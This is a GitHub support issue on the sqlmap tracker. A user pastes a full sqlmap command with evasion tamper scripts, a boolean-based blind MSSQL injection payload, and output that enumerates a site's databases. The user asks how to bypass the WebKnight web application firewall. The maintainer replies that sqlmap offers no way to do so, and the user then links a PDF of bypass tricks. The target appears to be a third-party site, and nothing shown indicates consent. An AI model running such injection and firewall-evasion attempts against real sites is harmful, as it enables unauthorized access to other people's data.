Skip to content

how can i bypass this is there a way= #949

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Closed
angelz12 opened this issue Nov 17, 2014 · 3 comments
Closed

how can i bypass this is there a way= #949

angelz12 opened this issue Nov 17, 2014 · 3 comments
Labels
support

Comments

@angelz12
Copy link

C:\Users\Angelz\Desktop\sqlmap neue version>sqlmap.py -u "http://www.test.asp" --"data=SearchField=1*&SearchStr=" --dbms=mssql --thread
s=10 --level=5 --risk=3 --no-cast --timeout=1000 --retries=10 --batch --tamper=charunicodeencode.py --tables
_
___ _| |___ ___ ___ {1.0-dev-nongit-20141117}
|_ -| . | | | .'| . |
|| |||||,| |
|| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state
and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 18:33:58

[18:33:58] [INFO] loading tamper script 'charunicodeencode'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[18:33:58] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)

Payload: SearchField=(SELECT (CASE WHEN (7096=7096) THEN 1 ELSE 7096*(SELECT 7096 FROM master..sysdatabases) END))&SearchStr=

[18:34:04] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[18:34:04] [INFO] testing Microsoft SQL Server
[18:34:04] [INFO] confirming Microsoft SQL Server
[18:34:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[18:34:04] [INFO] fetching database names
[18:34:04] [INFO] fetching number of databases
[18:34:04] [INFO] resumed: 9
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 9
[18:34:04] [INFO] resumed: *******
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 10
[18:34:04] [INFO] resumed: *******
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 12
[18:34:04] [INFO] resumed: *******
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 13
[18:34:04] [INFO] resumed: *********
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 6
[18:34:04] [INFO] resumed: master
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 6
[18:34:04] [INFO] resumed: mg1106
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 5
[18:34:04] [INFO] resumed: model
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 4
[18:34:04] [INFO] resumed: msdb
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 6
[18:34:04] [INFO] resumed: tempdb
[18:34:04] [INFO] fetching tables for databases: _, I__, ´***, __, master, mg1106, model, msdb, tempdb
[18:34:04] [INFO] fetching number of tables for database '_*****'
[18:34:04] [INFO] retrieved:
[18:34:05] [INFO] heuristics detected web page charset 'ascii'

[18:34:07] [INFO] retrieved:
[18:34:12] [INFO] retrieved:
[18:34:15] [WARNING] unable to retrieve the number of tables for database '_'
[18:34:15] [INFO] fetching number of tables for database 'tempdb'
[18:34:15] [INFO] retrieved:
[18:34:19] [INFO] retrieved:
[18:34:22] [INFO] retrieved:
[18:34:26] [WARNING] unable to retrieve the number of tables for database 'tempdb'
[18:34:26] [INFO] fetching number of tables for database '_'
[18:34:26] [INFO] retrieved:
[18:34:29] [INFO] retrieved:
[18:34:33] [INFO] retrieved:
[18:34:36] [WARNING] unable to retrieve the number of tables for database 'INix_Intra'
[18:34:36] [INFO] fetching number of tables for database '**_'
[18:34:36] [INFO] retrieved:
[18:34:40] [INFO] retrieved:
[18:34:43] [INFO] retrieved:
[18:34:47] [WARNING] unable to retrieve the number of tables for database '__'
[18:34:47] [INFO] fetching number of tables for database 'msdb'
[18:34:47] [INFO] retrieved:
[18:34:50] [INFO] retrieved:
[18:34:54] [INFO] retrieved:
[18:34:57] [WARNING] unable to retrieve the number of tables for database 'msdb'
[18:34:57] [INFO] fetching number of tables for database 'mg1106'
[18:34:57] [INFO] retrieved:
[18:35:01] [INFO] retrieved:
[18:35:04] [INFO] retrieved:
[18:35:08] [WARNING] unable to retrieve the number of tables for database 'mg1106'
[18:35:08] [INFO] fetching number of tables for database 'master'
[18:35:08] [INFO] retrieved:
[18:35:11] [INFO] retrieved:
[18:35:15] [INFO] retrieved:
[18:35:18] [WARNING] unable to retrieve the number of tables for database 'master'
[18:35:18] [INFO] fetching number of tables for database '_*********'
[18:35:18] [INFO] retrieved:
[18:35:22] [INFO] retrieved:
[18:35:27] [INFO] retrieved:
[18:35:31] [WARNING] unable to retrieve the number of tables for database '*************'
[18:35:31] [INFO] fetching number of tables for database 'model'
[18:35:31] [INFO] retrieved:
[18:35:34] [INFO] retrieved:
[18:35:38] [INFO] retrieved:
[18:35:41] [WARNING] unable to retrieve the number of tables for database 'model'
[18:35:41] [CRITICAL] unable to retrieve the tables for any database

i got this message on extended scan before...
[04:44:42] INFO POST parameter '#1_' seems to be 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)' injectable (with --string
="1. Take your best picture and post here.")
(custom) POST parameter '#1_' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[10:48:56] [INFO] target URL appears to have 169 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y

i tryed between and charunicodeencode both cant get it i can see the db´s i know the table names and coloums i retrieved slots but i cant see it my bypass script cant handle it i think...hope u can help me in this case. thank your for time sir. your sincerly...

...how can i bypass the webknight AQTRONIX
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
@stamparm
Copy link
Member

Currently there is no way (from sqlmap)

@angelz12
Copy link
Author

when is it available?<

@angelz12
Copy link
Author

http://ipv4.os3.nl/_media/2013-2014/courses/ot/andreas_george.pdf here for and update to bypass that shit maybe u can add this to tamper sources thx ps.:at the pdf u see category sql inject the waf a guy show some tricks^^

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
support
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@stamparm @angelz12